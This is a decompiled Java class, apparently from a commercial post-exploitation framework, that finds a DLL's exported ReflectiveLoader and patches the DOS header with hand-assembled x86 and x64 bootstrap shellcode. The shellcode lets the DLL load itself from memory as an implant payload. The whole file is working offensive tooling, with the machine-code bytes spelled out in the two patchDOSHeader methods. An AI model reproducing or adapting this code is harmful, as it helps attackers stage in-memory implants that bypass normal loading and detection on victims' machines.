/*
 * Decompiled with CFR 0.152.
 */
package common;

import common.CommonUtils;
import common.MudgeSanity;
import common.Packer;
import common.ReflectiveLoaderInfo;
import java.util.List;
import pe.PEParser;

public class ReflectiveDLL {
    public static final int EXIT_FUNK_PROCESS = 1453503984;
    public static final int EXIT_FUNK_THREAD = 170532320;

    public static void setReflectiveLoader(byte[] byArray, byte[] byArray2, ReflectiveLoaderInfo reflectiveLoaderInfo) {
        System.arraycopy(byArray2, 0, byArray, reflectiveLoaderInfo.offset, byArray2.length);
    }

    public static int findReflectiveLoader(PEParser pEParser) {
        List list = pEParser.getExportedFunctions();
        if (list == null) {
            return -1;
        }
        for (String string : list) {
            if (string.indexOf("ReflectiveLoader") < 0) continue;
            return pEParser.getFunctionOffset(string);
        }
        return -1;
    }

    public static int findReflectiveLoader(byte[] byArray) {
        try {
            return ReflectiveDLL.findReflectiveLoader(PEParser.load(byArray));
        }
        catch (Exception exception) {
            MudgeSanity.logException("Could not find Reflective Loader", exception, false);
            return -1;
        }
    }

    public static ReflectiveLoaderInfo getReflectiveLoaderInfo(PEParser pEParser, byte[] byArray) {
        ReflectiveLoaderInfo reflectiveLoaderInfo = new ReflectiveLoaderInfo();
        reflectiveLoaderInfo.offset = ReflectiveDLL.findReflectiveLoader(pEParser);
        if (reflectiveLoaderInfo.offset < 1) {
            throw new IllegalStateException("Reflective Loader Offset was not found.");
        }
        byte[] byArray2 = new byte[]{-52, -112, -112, -112, -112, -112, -112, -112};
        reflectiveLoaderInfo.realOffset = CommonUtils.indexOf(byArray, byArray2, reflectiveLoaderInfo.offset, reflectiveLoaderInfo.offset + 64);
        if (reflectiveLoaderInfo.realOffset > 0) {
            reflectiveLoaderInfo.length = ReflectiveDLL.findReflectiveLoaderLength(byArray, reflectiveLoaderInfo.realOffset);
        } else {
            reflectiveLoaderInfo.realOffset = reflectiveLoaderInfo.offset;
            reflectiveLoaderInfo.length = ReflectiveDLL.findReflectiveLoaderLength(byArray, reflectiveLoaderInfo.realOffset);
        }
        reflectiveLoaderInfo.totalLength = reflectiveLoaderInfo.length + (reflectiveLoaderInfo.realOffset - reflectiveLoaderInfo.offset);
        reflectiveLoaderInfo.peHeaderLocation = pEParser.getLocation("header.PE");
        reflectiveLoaderInfo.beaconArchitecture = pEParser.is64() ? "x64" : "x86";
        if (reflectiveLoaderInfo.length <= 0) {
            CommonUtils.print_error("Reflective Loader Space length is zero. Something is wrong!");
        }
        return reflectiveLoaderInfo;
    }

    public static int findReflectiveLoaderLength(byte[] byArray, int n) {
        if (byArray == null) {
            throw new NullPointerException("Reflective loader info error. Data is null.");
        }
        if (byArray.length < n + 1) {
            throw new IllegalArgumentException("Reflective loader offset (" + n + ") is beyond data length(" + byArray.length + ").");
        }
        int n2 = 0;
        while (n + n2 < byArray.length) {
            if ((byArray[n + n2] & 0xFF) != 204 && (byArray[n + n2] & 0xFF) != 144) {
                return n2;
            }
            ++n2;
        }
        CommonUtils.print_error("Something went wrong. End of reflective loader space was not found.");
        return n2;
    }

    public static boolean is64(byte[] byArray) {
        try {
            PEParser pEParser = PEParser.load(byArray);
            return pEParser.is64();
        }
        catch (Exception exception) {
            MudgeSanity.logException("Could not find parse PE header in binary blob", exception, false);
            return false;
        }
    }

    public static byte[] patchDOSHeader(byte[] byArray) {
        return ReflectiveDLL.patchDOSHeader(byArray, 1453503984);
    }

    public static byte[] patchDOSHeader(byte[] byArray, int n) {
        int n2 = ReflectiveDLL.findReflectiveLoader(byArray);
        if (ReflectiveDLL.is64(byArray)) {
            throw new RuntimeException("x64 DLL passed to x86 patch function");
        }
        if (n2 < 0) {
            return new byte[0];
        }
        Packer packer = new Packer();
        packer.little();
        packer.addByte(77);
        packer.addByte(90);
        packer.addByte(232);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(91);
        packer.addByte(82);
        packer.addByte(69);
        packer.addByte(85);
        packer.addByte(137);
        packer.addByte(229);
        packer.addByte(129);
        packer.addByte(195);
        packer.addInt(n2 - 7);
        packer.addByte(255);
        packer.addByte(211);
        packer.addByte(137);
        packer.addByte(195);
        packer.addByte(87);
        packer.addByte(104);
        packer.addByte(4);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(80);
        packer.addByte(255);
        packer.addByte(208);
        packer.addByte(104);
        packer.addInt(n);
        packer.addByte(104);
        packer.addByte(5);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(80);
        packer.addByte(255);
        packer.addByte(211);
        byte[] byArray2 = packer.getBytes();
        if (byArray2.length > 60) {
            CommonUtils.print_error("bootstrap length is: " + byArray2.length + " (it's too big!)");
            return new byte[0];
        }
        for (int i = 0; i < byArray2.length; ++i) {
            byArray[i] = byArray2[i];
        }
        return byArray;
    }

    public static byte[] patchDOSHeaderX64(byte[] byArray) {
        return ReflectiveDLL.patchDOSHeaderX64(byArray, 1453503984);
    }

    public static byte[] patchDOSHeaderX64(byte[] byArray, int n) {
        int n2 = ReflectiveDLL.findReflectiveLoader(byArray);
        if (!ReflectiveDLL.is64(byArray)) {
            throw new RuntimeException("x86 DLL passed to x64 patch function");
        }
        if (n2 < 0) {
            return new byte[0];
        }
        Packer packer = new Packer();
        packer.little();
        packer.addByte(77);
        packer.addByte(90);
        packer.addByte(65);
        packer.addByte(82);
        packer.addByte(85);
        packer.addByte(72);
        packer.addByte(137);
        packer.addByte(229);
        packer.addByte(72);
        packer.addByte(129);
        packer.addByte(236);
        packer.addByte(32);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(72);
        packer.addByte(141);
        packer.addByte(29);
        packer.addByte(234);
        packer.addByte(255);
        packer.addByte(255);
        packer.addByte(255);
        packer.addByte(72);
        packer.addByte(129);
        packer.addByte(195);
        packer.addInt(n2);
        packer.addByte(255);
        packer.addByte(211);
        packer.addByte(72);
        packer.addByte(137);
        packer.addByte(195);
        packer.addByte(73);
        packer.addByte(137);
        packer.addByte(248);
        packer.addByte(104);
        packer.addByte(4);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(90);
        packer.addByte(255);
        packer.addByte(208);
        packer.addByte(65);
        packer.addByte(184);
        packer.addInt(n);
        packer.addByte(104);
        packer.addByte(5);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(0);
        packer.addByte(90);
        packer.addByte(255);
        packer.addByte(211);
        byte[] byArray2 = packer.getBytes();
        if (byArray2.length > 60) {
            CommonUtils.print_error("bootstrap length is: " + byArray2.length + " (it's too big!)");
            return new byte[0];
        }
        for (int i = 0; i < byArray2.length; ++i) {
            byArray[i] = byArray2[i];
        }
        return byArray;
    }
}

